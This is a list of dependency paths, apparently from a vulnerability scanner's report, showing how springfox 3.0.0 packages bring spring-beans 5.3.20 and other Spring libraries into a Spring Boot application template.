  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20
